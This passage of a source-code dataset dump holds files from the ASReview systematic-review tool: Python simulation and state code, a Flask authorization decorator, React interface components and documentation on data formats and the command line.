= True\n        # Otherwise, stop when reaching stop_if (if provided)\n        elif self.stop_if is not None:\n            with open_state(self.project) as state:\n                training_sets = state.get_training_sets()\n                # There is one query per trained model. We subtract 1\n                # for the priors.\n                stop_if = len(set(training_sets)) - 1\n            if stop_if >= self.stop_if:\n                stop = True\n\n        return stop\n\n    def _query(self, n):\n        \"\"\"Query new records to label.\n\n        Arguments\n        ---------\n        n: int\n            Number of records to query.\n\n        Returns\n        -------\n        list\n            List of record_ids of the n top ranked records according to the last\n            ranking saved in the state.\n        \"\"\"\n        with open_state(self.project, read_only=False) as s:\n            top_n_records = s.query_top_ranked(n)\n        return top_n_records\n\n    def _label(self, record_ids, prior=False):\n        \"\"\"Label queried records using the known labels in a simulated review.\n\n        Arguments\n        ---------\n        record_ids: list\n            List of record_ids that will be labeled.\n        prior: bool\n            Whether the records are priors or not.\n        \"\"\"\n        labels = self.data_labels[record_ids]\n\n        with open_state(self.project, read_only=False) as s:\n            s.add_labeling_data(record_ids, labels, prior=prior)\n\n    def train(self):\n        \"\"\"Train a new model on the labeled data.\"\"\"\n        # Check if both labels are available.\n        with open_state(self.project) as state:\n            labeled = state.get_labeled()\n            labels = labeled[\"label\"].to_list()\n            training_set = len(labeled)\n            if not (0 in labels and 1 in labels):\n                raise ValueError(\n                    \"Not both labels available. 
\" \"Stopped training the model\"\n )\n\n # TODO: Simplify balance model input.\n # Use the balance model to sample the trainings data.\n y_sample_input = (\n pd.DataFrame(self.record_table)\n .merge(labeled, how=\"left\", on=\"record_id\")\n .loc[:, \"label\"]\n .fillna(LABEL_NA)\n .to_numpy()\n )\n train_idx = np.where(y_sample_input != LABEL_NA)[0]\n\n X_train, y_train = self.balance_model.sample(self.X, y_sample_input, train_idx)\n\n # Fit the classifier on the trainings data.\n self.classifier.fit(X_train, y_train)\n\n # Use the query strategy to produce a ranking.\n ranked_record_ids = self.query_strategy.query(\n self.X, classifier=self.classifier\n )\n\n # TODO: Also log the probablities.\n # Log the ranking in the state.\n with open_state(self.project, read_only=False) as state:\n state.add_last_ranking(\n ranked_record_ids,\n self.classifier.name,\n self.query_strategy.name,\n self.balance_model.name,\n self.feature_extraction.name,\n training_set,\n )\n" }, { "alpha_fraction": 0.6646207571029663, "alphanum_fraction": 0.6738272905349731, "avg_line_length": 33.56060791015625, "blob_id": "d9181cd48bd2bde58150a51c8a6af6e2e28f81cb", "content_id": "fb33cba98461751cc9253c013ab9fd664d053449", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2281, "license_type": "permissive", "max_line_length": 74, "num_lines": 66, "path": "/asreview/webapp/authentication/login_required.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom functools import wraps\n\nfrom flask import current_app\nfrom flask import jsonify\nfrom flask import request\nfrom flask_login import current_user\nfrom flask_login.config import EXEMPT_METHODS\n\nfrom asreview.webapp.authentication.models import Project\n\n\ndef asreview_login_required(func):\n @wraps(func)\n def decorated_view(*args, **kwargs):\n if not current_app.config.get(\"AUTHENTICATION_ENABLED\"):\n pass\n elif request.method in EXEMPT_METHODS:\n pass\n else:\n if not (bool(current_user) and current_user.is_authenticated):\n return jsonify({\"message\": \"Login required.\"}), 401\n\n return func(*args, **kwargs)\n\n return decorated_view\n\n\ndef project_authorization(f):\n \"\"\"Decorator function that checks if current user can access\n a project in an authenticated situation\"\"\"\n\n @wraps(f)\n def decorated_function(project_id, *args, **kwargs):\n if app_is_authenticated(current_app):\n # find the project\n project = Project.query.filter(\n Project.project_id == project_id\n ).one_or_none()\n if project is None:\n return jsonify({\"message\": \"project not found\"}), 404\n # if there is a project, check if\n all_users = set([project.owner] + project.collaborators)\n if current_user not in all_users:\n return jsonify({\"message\": \"no permission\"}), 403\n return f(project_id, *args, **kwargs)\n\n return decorated_function\n\n\ndef 
app_is_authenticated(app):\n    \"\"\"Checks if the app is authenticated\"\"\"\n    return app.config.get(\"AUTHENTICATION_ENABLED\", False)\n" }, { "alpha_fraction": 0.5339158177375793, "alphanum_fraction": 0.5366163849830627, "avg_line_length": 31.448453903198242, "blob_id": "e8aaa0b6aa9a1f984109b4a514ac50385c9a7558", "content_id": "95317bed4ec86587012139536ec93f407942b082", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 6295, "license_type": "permissive", "max_line_length": 108, "num_lines": 194, "path": "/asreview/webapp/src/ProjectComponents/TeamComponents/InvitationComponent.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQuery } from \"react-query\";\nimport { useParams } from \"react-router-dom\";\nimport { TeamAPI } from \"../../api/index.js\";\nimport List from \"@mui/material/List\";\nimport { Add } from \"@mui/icons-material\";\nimport TextField from \"@mui/material/TextField\";\nimport Autocomplete from \"@mui/material/Autocomplete\";\nimport UserListEntry from \"./UserListEntry\";\nimport { Box, Fab, Stack } from \"@mui/material\";\nimport { ConfirmationDialog } from \".\";\n\nconst InvitationContents = (props) => {\n  const [selectedUser, setSelectedUser] = React.useState(null);\n  const [removeUser, setRemoveUser] = React.useState(null);\n  const [inputValue, setInputValue] = React.useState(\"\");\n  const [collaborators, setCollaborators] = React.useState(new Set([]));\n  const [invitedUsers, setInvitedUsers] = React.useState(new Set([]));\n  const [allUsers, setAllUsers] = React.useState([]);\n  const [associatedUsers, setAssociatedUsers] = React.useState(new Set([]));\n  const { project_id } = useParams();\n  const [dialogOpen, setDialogOpen] = React.useState(false);\n\n  const handleOpenConfirmationDialog = (user) => {\n    setRemoveUser(user);\n    setDialogOpen(true);\n  };\n\n  const handleCloseConfirmationDialog = () => {\n    setDialogOpen(false);\n  };\n\n  useQuery(\n    [\"fetchCollaborators\", project_id],\n    () => TeamAPI.fetchCollaborators(project_id),\n    {\n      onSuccess: (data) => {\n        setAllUsers(data.all_users || []);\n        setCollaborators(new Set(data.collaborators || []));\n        setInvitedUsers(new Set(data.invitations || []));\n      },\n      onError: (data) => {\n        console.log(\"error\", data);\n      },\n    },\n  );\n\n  React.useEffect(() => {\n    setAssociatedUsers((state) => new Set([...collaborators, ...invitedUsers]));\n  }, [collaborators, invitedUsers]);\n\n  const inviteUser = () => {\n    if (selectedUser) {\n      TeamAPI.inviteUser(project_id, selectedUser.id)\n        .then((data) => {\n          if (data.success) {\n            // add this user to the invited users (useEffect will take care of the rest\n            // -autocomplete-)\n            setInvitedUsers((state) => new Set([...state, selectedUser.id]));\n            // set selected value to null\n            setSelectedUser(null);\n          } else {\n            console.log(\"Could not invite user -- DB failure\");\n          }\n        })\n        .catch((err) => console.log(\"Could not invite user\", err));\n    }\n  };\n\n  const removeInvitation = (id) => {\n    TeamAPI.deleteInvitation(project_id, id)\n      .then((data) => {\n        if (data.success) {\n          // remove from the invited users list, useEffect will take care of the rest\n          // for the autocomplete\n          setInvitedUsers((state) => {\n            state.delete(id);\n            return new Set([...state]);\n          });\n        } else {\n          console.log(\"Could not delete invitation -- DB failure\");\n        }\n      })\n      .catch((err) => console.log(\"Could not delete invitation\", err));\n  };\n\n  const removeCollaborator = () => {\n    if 
(removeUser) {\n      // close the confirmation dialog if open\n      if (dialogOpen) {\n        setDialogOpen(false);\n      }\n      // remove from backend\n      TeamAPI.endCollaboration(project_id, removeUser.id)\n        .then((data) => {\n          if (data.success) {\n            // remove from the collaborators list, useEffect will take care of the rest\n            // for the autocomplete\n            setCollaborators((state) => {\n              state.delete(removeUser.id);\n              return new Set([...state]);\n            });\n          } else {\n            console.log(\"Could not end collaboration -- DB failure\");\n          }\n        })\n        .catch((err) => console.log(\"Could not end collaboration\", err));\n    }\n  };\n\n  return (\n    <>\n      <Box>\n        <Box>\n          <h2>Invite</h2>\n          <Autocomplete\n            value={selectedUser}\n            isOptionEqualToValue={(option, value) => option.id === value.id}\n            onChange={(event, newValue = null) => {\n              if (newValue !== null) {\n                setSelectedUser(newValue);\n              }\n            }}\n            inputValue={inputValue}\n            onInputChange={(event, newInputValue) => {\n              setInputValue(newInputValue);\n            }}\n            id=\"controllable-states-demo\"\n            options={allUsers.filter((item) => !associatedUsers.has(item.id))}\n            getOptionLabel={(option) => `${option.name}`}\n            sx={{ width: 300, padding: 1 }}\n            renderInput={(params) => (\n              <TextField {...params} label=\"Select a user\" />\n            )}\n          />\n          <Fab\n            className=\"\"\n            color=\"primary\"\n            onClick={inviteUser}\n            variant=\"extended\"\n            sx={{ width: 120, padding: 1, margin: 2 }}\n          >\n            <Add sx={{ mr: 1 }} />\n            Invite\n          </Fab>\n        </Box>\n\n        <Box>\n          <h2>Pending (double-click to remove)</h2>\n          <List component={Stack} direction=\"row\">\n            {allUsers\n              .filter((item) => invitedUsers.has(item.id))\n              .map((user) => (\n                <UserListEntry\n                  key={user.id}\n                  user={user}\n                  onDoubleClick={removeInvitation}\n                />\n              ))}\n          </List>\n        </Box>\n\n        <Box>\n          <h2>Collaborators (double-click to remove)</h2>\n          <List sx={{ pt: 0 }}>\n            {allUsers\n              .filter((item) => collaborators.has(item.id))\n              .map((user) => (\n                <UserListEntry\n                  key={user.id}\n                  user={user}\n                  onDoubleClick={handleOpenConfirmationDialog}\n                />\n              ))}\n          </List>\n        </Box>\n      </Box>\n\n      <ConfirmationDialog\n        open={dialogOpen}\n        title={`Remove \"${\n          removeUser && Boolean(removeUser.name) ? removeUser.name : \"unknown\"\n        }\" from project`}\n        contents={\n          \"Are you sure? 
You will remove this person from this project if you click on the 'Remove' button.\"\n }\n handleCancel={handleCloseConfirmationDialog}\n handleConfirm={removeCollaborator}\n />\n </>\n );\n};\n\nexport default InvitationContents;\n" }, { "alpha_fraction": 0.5036057829856873, "alphanum_fraction": 0.5132211446762085, "avg_line_length": 26.733333587646484, "blob_id": "b6bd964b060ea2b584493f917ca93dee34446bb5", "content_id": "5a23b116f9671c445c534fd740ba0bc24daf263b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4992, "license_type": "permissive", "max_line_length": 89, "num_lines": 180, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/DataComponents/PriorSearch.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQuery, useQueryClient } from \"react-query\";\nimport { connect } from \"react-redux\";\nimport {\n Box,\n CircularProgress,\n Divider,\n Fade,\n InputBase,\n Stack,\n Tooltip,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { ArrowBack, Search } from \"@mui/icons-material\";\n\nimport { InfoCard } from \"../../SetupComponents\";\nimport { InlineErrorHandler } from \"../../../Components\";\nimport { PriorUnlabeled } from \"../DataComponents\";\nimport { StyledIconButton } from \"../../../StyledComponents/StyledButton\";\nimport { ProjectAPI } from \"../../../api/index.js\";\nimport { mapStateToProps } from \"../../../globals.js\";\nimport { useToggle } from \"../../../hooks/useToggle\";\n\nconst PREFIX = \"PriorSearch\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n recordCard: `${PREFIX}-record-card`,\n infoCard: `${PREFIX}-info-card`,\n empty: `${PREFIX}-empty`,\n loading: `${PREFIX}-loading`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n height: \"100%\",\n [`& .${classes.root}`]: {\n height: \"100%\",\n },\n\n [`& .${classes.recordCard}`]: {\n alignItems: \"center\",\n height: \"calc(100vh - 208px)\",\n width: \"100%\",\n overflowY: \"scroll\",\n padding: \"32px 24px\",\n [theme.breakpoints.down(\"md\")]: {\n height: \"calc(100% - 56px)\",\n },\n },\n\n [`& .${classes.infoCard}`]: {\n width: \"100%\",\n maxWidth: \"400px\",\n },\n\n [`& .${classes.empty}`]: {\n height: \"calc(100% - 56px)\",\n display: \"flex\",\n alignItems: \"center\",\n justifyContent: \"center\",\n },\n\n [`& .${classes.loading}`]: {\n height: \"calc(100% - 56px)\",\n display: \"flex\",\n alignItems: \"center\",\n justifyContent: \"center\",\n },\n}));\n\nconst PriorSearch = (props) => {\n const queryClient = useQueryClient();\n const [keyword, setKeyword] = React.useState(\"\");\n const [clickSearch, onClickSearch] = useToggle();\n\n const { data, error, isError, isFetched, isFetching, isSuccess } = useQuery(\n [\"fetchPriorSearch\", { project_id: props.project_id, keyword: keyword }],\n ProjectAPI.fetchPriorSearch,\n {\n enabled: clickSearch,\n onSuccess: () => {\n if (clickSearch) {\n onClickSearch();\n }\n },\n refetchOnWindowFocus: false,\n },\n );\n\n const refetchPriorSearch = () => {\n queryClient.resetQueries(\"fetchPriorSearch\");\n };\n\n const onChangeKeyword = (event) => {\n setKeyword(event.target.value);\n };\n\n const onKeyDown = (event) => {\n if (event.key === \"Enter\") {\n onClickSearch();\n }\n };\n\n return (\n <Root>\n <Fade in>\n <Box className={classes.root}>\n <Stack direction=\"row\" sx={{ p: \"4px 16px\" }}>\n <Tooltip title=\"Select another way\">\n 
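{/* leaving search mode is delegated to the parent component via props.toggleSearch */}\n              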
<StyledIconButton onClick={props.toggleSearch}>\n <ArrowBack />\n </StyledIconButton>\n </Tooltip>\n <InputBase\n autoFocus\n fullWidth\n onChange={onChangeKeyword}\n onKeyDown={onKeyDown}\n placeholder=\"Search\"\n sx={{ ml: 1 }}\n />\n <StyledIconButton onClick={onClickSearch}>\n <Search />\n </StyledIconButton>\n </Stack>\n <Divider />\n {isFetching && !isError && (\n <Box className={classes.loading}>\n <CircularProgress />\n </Box>\n )}\n {!isFetching && isError && (\n <Box className={classes.empty}>\n <InlineErrorHandler\n message={error[\"message\"]}\n refetch={refetchPriorSearch}\n button={true}\n />\n </Box>\n )}\n {!isFetching &&\n !isError &&\n (data === undefined ||\n !data?.result.filter((record) => record?.included === -1)\n .length) && (\n <Box className={classes.empty}>\n <Typography variant=\"body2\" sx={{ color: \"text.secondary\" }}>\n Your search results will show up here\n </Typography>\n </Box>\n )}\n {!isError && isFetched && isSuccess && (\n <Stack\n className={classes.recordCard}\n aria-label=\"unlabeled record card\"\n spacing={3}\n >\n <Box className={classes.infoCard}>\n <InfoCard info=\"Label records that you want to use as prior knowledge\" />\n </Box>\n {data?.result\n .filter((record) => record?.included === -1)\n .map((record, index) => (\n <PriorUnlabeled\n keyword={keyword}\n record={record}\n n_prior={props.n_prior}\n key={`result-page-${index}`}\n />\n ))}\n </Stack>\n )}\n </Box>\n </Fade>\n </Root>\n );\n};\n\nexport default connect(mapStateToProps)(PriorSearch);\n" }, { "alpha_fraction": 0.6604584455490112, "alphanum_fraction": 0.6604584455490112, "avg_line_length": 23.068965911865234, "blob_id": "26a9239f7898e5a1270b3d928f4652b18e239143", "content_id": "063fc88b014ef58ded7ec5749f4b53b7d6922d90", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 698, "license_type": "permissive", "max_line_length": 69, "num_lines": 29, "path": "/asreview/webapp/src/Components/DialogErrorHandler.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQueryClient } from \"react-query\";\nimport {\n Button,\n Dialog,\n DialogActions,\n DialogContent,\n DialogContentText,\n} from \"@mui/material\";\n\nexport default function DialogErrorHandler(props) {\n const queryClient = useQueryClient();\n const resetQuery = () => {\n queryClient.resetQueries(props.queryKey);\n };\n\n return (\n <Dialog open={props.isError} onClose={resetQuery}>\n <DialogContent>\n <DialogContentText>{props.error?.message}</DialogContentText>\n </DialogContent>\n <DialogActions>\n <Button onClick={resetQuery} autoFocus>\n Try to Refresh\n </Button>\n </DialogActions>\n </Dialog>\n );\n}\n" }, { "alpha_fraction": 0.6344696879386902, "alphanum_fraction": 0.6344696879386902, "avg_line_length": 26.310344696044922, "blob_id": "f8efef52a10497e3d4afff4c99d3e87014fc1c57", "content_id": "72dfa71fea72271980e5829e8cf38e02b725aab3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1636, "license_type": "permissive", "max_line_length": 161, "num_lines": 58, "path": "/asreview/webapp/src/ProjectComponents/AnalyticsComponents/ShareFabAction.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport {\n EmailShareButton,\n FacebookShareButton,\n TwitterShareButton,\n WeiboShareButton,\n WhatsappShareButton,\n} from \"react-share\";\nimport { styled } 
from \"@mui/material/styles\";\n\nconst Root = styled(\"div\")(({ theme }) => ({\n display: \"none\",\n}));\n\nconst asreview_url = \"https://asreview.ai\";\nconst hashtag = \"SystematicReview\";\n\nexport default function ShareFabAction(props) {\n const n_papers = props.progressQueryData?.n_papers;\n const n_included = props.progressQueryData?.n_included;\n const n_labeled =\n props.progressQueryData?.n_included + props.progressQueryData?.n_excluded;\n\n const text_en = `I'm using ASReview LAB to systematically review ${n_papers} records and found ${n_included} relevant ones after only reviewing ${n_labeled}!`;\n const text_cn = `我在用ASReview LAB对${n_papers}篇文献做系统综述(systematic review)。筛选${n_labeled}篇之后,发现了${n_included}篇相关!`;\n\n return (\n <Root>\n <TwitterShareButton\n ref={props.twitterRef}\n url={asreview_url}\n title={text_en}\n via=\"asreviewlab\"\n hashtags={[hashtag]}\n />\n <FacebookShareButton\n ref={props.facebookRef}\n url={asreview_url}\n quote={text_en}\n />\n <WeiboShareButton\n ref={props.weiboRef}\n url={asreview_url}\n title={text_cn}\n />\n <WhatsappShareButton\n ref={props.whatsappRef}\n url={asreview_url}\n title={text_en}\n />\n <EmailShareButton\n ref={props.emailRef}\n url={asreview_url}\n body={text_en}\n />\n </Root>\n );\n}\n" }, { "alpha_fraction": 0.6265060305595398, "alphanum_fraction": 0.6361445784568787, "avg_line_length": 20.842105865478516, "blob_id": "dac0434f869c93829736d22b6813f88e28c8d7f2", "content_id": "261264055b57d59e6334ebe42496b11ff66c0668", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 415, "license_type": "permissive", "max_line_length": 51, "num_lines": 19, "path": "/asreview/webapp/src/Components/ActionsFeedbackBar.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { Snackbar } from \"@mui/material\";\n\nexport default function ActionsFeedbackBar(props) {\n let anchorOrigin = {\n vertical: \"bottom\",\n horizontal: !props.center ? \"right\" : \"center\",\n };\n\n return (\n <Snackbar\n anchorOrigin={anchorOrigin}\n onClose={props.onClose}\n open={props.open}\n autoHideDuration={6000}\n message={props.feedback}\n />\n );\n}\n" }, { "alpha_fraction": 0.5376048684120178, "alphanum_fraction": 0.5400797724723816, "avg_line_length": 54.9461555480957, "blob_id": "693d49eeb337f77988292ffe23e3779b112a05c0", "content_id": "c0cd4d502921e16a72158b9defee85131d9b093e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 7273, "license_type": "permissive", "max_line_length": 143, "num_lines": 130, "path": "/docs/source/data_format.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Data format\n===========\n\nTo carry out a systematic review with ASReview on your own dataset, your data\nfile needs to adhere to a certain format. ASReview accepts the following\nformats:\n\n\nTabular file format\n-------------------\n\nTabular datasets with extensions ``.csv``, ``.tab``, ``.tsv``, or ``.xlsx``\ncan be used in ASReview LAB. CSV and TAB files are preferably comma,\nsemicolon, or tab-delimited. The preferred file encoding is *UTF-8* or\n*latin1*.\n\nFor tabular data files, the software accepts a set of predetermined column names:\n\n.. _column-names:\n\n.. 
table:: Table with column name definitions\n   :widths: 20 60 20\n\n   +-------------+---------------------------------------------------------------------------------------------------------+-----------+\n   | Name        | Column names                                                                                            | Mandatory |\n   +=============+=========================================================================================================+===========+\n   | Title       | title, primary_title                                                                                    | yes\\*     |\n   +-------------+---------------------------------------------------------------------------------------------------------+-----------+\n   | Abstract    | abstract, abstract note                                                                                 | yes\\*     |\n   +-------------+---------------------------------------------------------------------------------------------------------+-----------+\n   | Keywords    | keywords                                                                                                | no        |\n   +-------------+---------------------------------------------------------------------------------------------------------+-----------+\n   | Authors     | authors, author names, first_authors                                                                    | no        |\n   +-------------+---------------------------------------------------------------------------------------------------------+-----------+\n   | DOI         | doi                                                                                                     | no        |\n   +-------------+---------------------------------------------------------------------------------------------------------+-----------+\n   | URL         | url                                                                                                     | no        |\n   +-------------+---------------------------------------------------------------------------------------------------------+-----------+\n   | Included    | final_included, label, label_included, included_label, included_final, included, included_flag, include | no        |\n   +-------------+---------------------------------------------------------------------------------------------------------+-----------+\n\n\n\\* Only a title or an abstract is mandatory.\n\n**Title, Abstract** Each record (i.e., entry in the dataset) should hold\nmetadata on a paper. Mandatory metadata are only ``title`` or ``abstract``. If\nboth title and abstract are available, the text is combined and used for\ntraining the model. If the column ``title`` is empty, the software will search\nfor the next column ``primary_title`` and the same holds for ``abstract`` and\n``abstract_note``.\n\n**Keywords, Authors** If ``keywords`` and/or ``author`` (or if the column is\nempty: ``author names`` or ``first_authors``) are available, they can be used for\nsearching prior knowledge. Note that the information is not shown during the\nscreening phase and is also not used for training the model, but the\ninformation is available via the API.\n\n**DOI and URL**\nIf a Digital Object Identifier (``DOI``) is available it will be displayed during the\nscreening phase as a clickable hyperlink to the full text document. Similarly, if a URL\nis provided, this is also displayed as a clickable link. Note that by\nusing ASReview you do *not* automatically have access to full-text and if you do\nnot have access you might want to read this `blog post <https://asreview.ai/blog/tools-that-work-well-with-asreview-google-scholar-button/>`__.\n\n**Included** A binary variable indicating the existing labeling decisions with\n``0`` = irrelevant/excluded, and ``1`` = relevant/included. Different column\nnames are allowed, see the table. It can be used for:\n\n- **Screening**: In ASReview LAB, if labels are available for a part of the\n  dataset (see :doc:`data_labeled`), the\n  labels will be automatically detected and used for prior knowledge. 
The first\n  iteration of the model will then be based on these decisions and used to\n  predict relevance scores for the unlabeled part of the data.\n- **Exploration**: You can explore a completely labeled dataset in the Exploration\n  Mode. The relevant/irrelevant label in the dataset will be displayed on each record.\n  This option is useful for training purposes, presentations, and workshops.\n- **Simulation**: In a :doc:`Simulation<simulation_overview/>`,\n  the column containing the labels is used to simulate a systematic review run.\n  Only records containing labels are used for the simulation, unlabeled records are ignored.\n\n.. note::\n\n   Files exported with ASReview LAB contain the column ``included``. When\n   re-importing a partly labeled dataset in RIS file format, the labels\n   stored in the N1 field are used as prior knowledge. When a completely\n   labeled dataset is re-imported it can be used in the Exploration and\n   Simulation mode. \n
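\nAs an illustration only (all values below are made up), a minimal CSV file using these column names could look as follows, with ``1`` marking a relevant record and ``0`` an irrelevant one:\n\n.. code-block:: text\n\n   title,abstract,doi,included\n   \"A study on A\",\"We study topic A.\",10.1000/example.1,1\n   \"A study on B\",\"We study topic B.\",10.1000/example.2,0\n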
\n\nRIS file format\n---------------\n\nRIS file formats (with extensions ``.ris`` or ``.txt``) are used by digital\nlibraries, like IEEE Xplore, Scopus and ScienceDirect. Citation managers\nMendeley, RefWorks, Zotero, and EndNote support the RIS file format as well.\nSee `(wikipedia) <https://en.wikipedia.org/wiki/RIS_(file_format)>`__ for \ndetailed information about the format. \n\nFor parsing RIS file format, ASReview LAB uses a Python RIS files parser and\nreader (`rispy <https://pypi.org/project/rispy/>`__). Successful import/export\ndepends on a proper data set structure. The complete list of accepted fields and \ndefault mapping can be found on the `rispy GitHub page <https://github.com/MrTango/rispy>`_.\n\n\n.. tip:: \n\n   The labels ``ASReview_relevant``, ``ASReview_irrelevant``, and\n   ``ASReview_not_seen`` are stored with the N1 (Notes) tag. In citation managers\n   Zotero and Endnote the labels can be used for making selections; see the\n   screenshots or watch the `instruction video <https://www.youtube.be/-Rw291AE20I>`_. \n\n.. note:: \n\n   When re-importing a partly labeled dataset in the RIS file format, the\n   labels stored in the N1 field are used as prior knowledge. When a completely\n   labeled dataset is re-imported it can be used in the Exploration and\n   Simulation mode. \n\n\n\n.. figure:: ../images/asreview_export_to_zotero_labeled.png\n   :alt: Example record with a labeling decision imported to Zotero\n\n   Example record with a labeling decision imported to Zotero\n\n\n.. figure:: ../images/asreview_export_to_endnote_labeled.png\n   :alt: Example record with a labeling decision imported to Endnote\n   \n   Example record with a labeling decision imported to Endnote\n" }, { "alpha_fraction": 0.740362823009491, "alphanum_fraction": 0.7471655607223511, "avg_line_length": 41, "blob_id": "1cae03ee6acd8e8098420eb3dffeaa43282e589f", "content_id": "d551afb0c90b463b3a01b4d0e18fe72cb49810df", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 882, "license_type": "permissive", "max_line_length": 83, "num_lines": 21, "path": "/docs/source/cli.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Command Line\n============\n\nASReview provides a powerful command line interface for running\ntasks such as :doc:`start` and :doc:`simulation_cli`. Also, :doc:`extensions_overview` often\nmake use of the command line interface by extending it with subcommands.\n\nThe structure of the command line is given by:\n\n.. code-block:: bash\n\n\tasreview [-h] [-V] [subcommand]\n\nA list of available and installed subcommands is given by :code:`asreview -h`.\nEach subcommand is listed with its name, the package it comes from, and\nthe version of that package. For example, the default subcommand ``lab``\n(to start ASReview LAB) is listed as ``lab [asreview-1.0]``. A\nsubcommand installed via an extension, e.g. ``plot``, is listed as ``plot\n[asreview-insights-1.1]`` where ``asreview-insights`` is the name of the\nextension that installed this subcommand and 1.1 is the version of this\npackage.\n" }, { "alpha_fraction": 0.5850231051445007, "alphanum_fraction": 0.5865288376808167, "avg_line_length": 28.043731689453125, "blob_id": "aceda00db229ec44ca77eed4b8299a750489f2f3", "content_id": "b99e8108ecd85b09ddc764bf9d5c4b879556e4a7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9962, "license_type": "permissive", "max_line_length": 84, "num_lines": 343, "path": "/asreview/state/base.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#    http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom abc import ABC\nfrom abc import abstractmethod\n\n\nclass BaseState(ABC):\n    def __init__(self, read_only=False):\n        \"\"\"Abstract Base Class for state.\n\n        read_only: bool\n            Whether to open file in read only mode.\n        \"\"\"\n        self.read_only = read_only\n\n    def __enter__(self):\n        return self\n\n    def __exit__(self, *_, **__):\n        self.close()\n\n    def __str__(self):\n        return str(self.to_dict())\n\n    @abstractmethod\n    def _create_new_state_file(self, working_dir, review_id):\n        \"\"\"Create empty internal structure for state.\n\n        Arguments\n        ---------\n        working_dir: str, pathlib.Path\n            Location of project file.\n        review_id: str\n            Identifier of the review.\n        \"\"\"\n        raise NotImplementedError\n\n    @abstractmethod\n    def _restore(self, working_dir, review_id):\n        \"\"\"Restore state from a state file.\n\n        Arguments\n        ---------\n        working_dir: str, pathlib.Path\n            Location of project file.\n        review_id: str\n            Identifier of the review.\n        \"\"\"\n        raise NotImplementedError\n\n    @abstractmethod\n    def add_record_table(self, record_ids):\n        \"\"\"Add the record table to the state.\n\n        Arguments\n        ---------\n        record_ids: list-like\n            List containing all record ids of the dataset.\n        \"\"\"\n        raise NotImplementedError\n\n    @abstractmethod\n    def add_last_probabilities(self, probabilities):\n        \"\"\"Save the probabilities produced by the last classifier.\n\n        Arguments\n        ---------\n        probabilities: list-like.\n            List containing the probabilities for every record.\n        \"\"\"\n        raise NotImplementedError\n\n    @abstractmethod\n    def add_last_ranking(\n        self,\n        ranked_record_ids,\n        classifier,\n        query_strategy,\n        balance_strategy,\n        feature_extraction,\n        training_set,\n    ):\n        \"\"\"Save the ranking of the last iteration of the model, in the ranking\n        order.\n\n        Arguments\n        ---------\n        ranked_record_ids: 
list, numpy.ndarray\n            A list of record ids in the order that they were ranked.\n        classifier: str\n            Name of the classifier of the model.\n        query_strategy: str\n            Name of the query strategy of the model.\n        balance_strategy: str\n            Name of the balance strategy of the model.\n        feature_extraction: str\n            Name of the feature extraction method of the model.\n        training_set: int\n            Number of labeled records available at the time of training.\n        \"\"\"\n        raise NotImplementedError\n\n    @abstractmethod\n    def get_last_probabilities(self):\n        \"\"\"Get the probabilities produced by the last classifier.\n\n        Returns\n        -------\n        pd.Series:\n            Series with name 'proba' containing the probabilities.\n        \"\"\"\n        raise NotImplementedError\n\n    @property\n    @abstractmethod\n    def settings(self):\n        \"\"\"Get settings from the state.\"\"\"\n        raise NotImplementedError\n\n    @abstractmethod\n    def add_note(self, note, record_id):\n        \"\"\"Add a text note to save with a labeled record.\n\n        Arguments\n        ---------\n        note: str\n            Text note to save.\n        record_id: int\n            Identifier of the record to which the note should be added.\n        \"\"\"\n        raise NotImplementedError\n\n    @abstractmethod\n    def add_labeling_data(self, record_ids, labels, notes=None, prior=False):\n        \"\"\"Add the data corresponding to a labeling action to the state file.\n\n        Arguments\n        ---------\n        record_ids: list, numpy.ndarray\n            A list of ids of the labeled records as int.\n        labels: list, numpy.ndarray\n            A list of 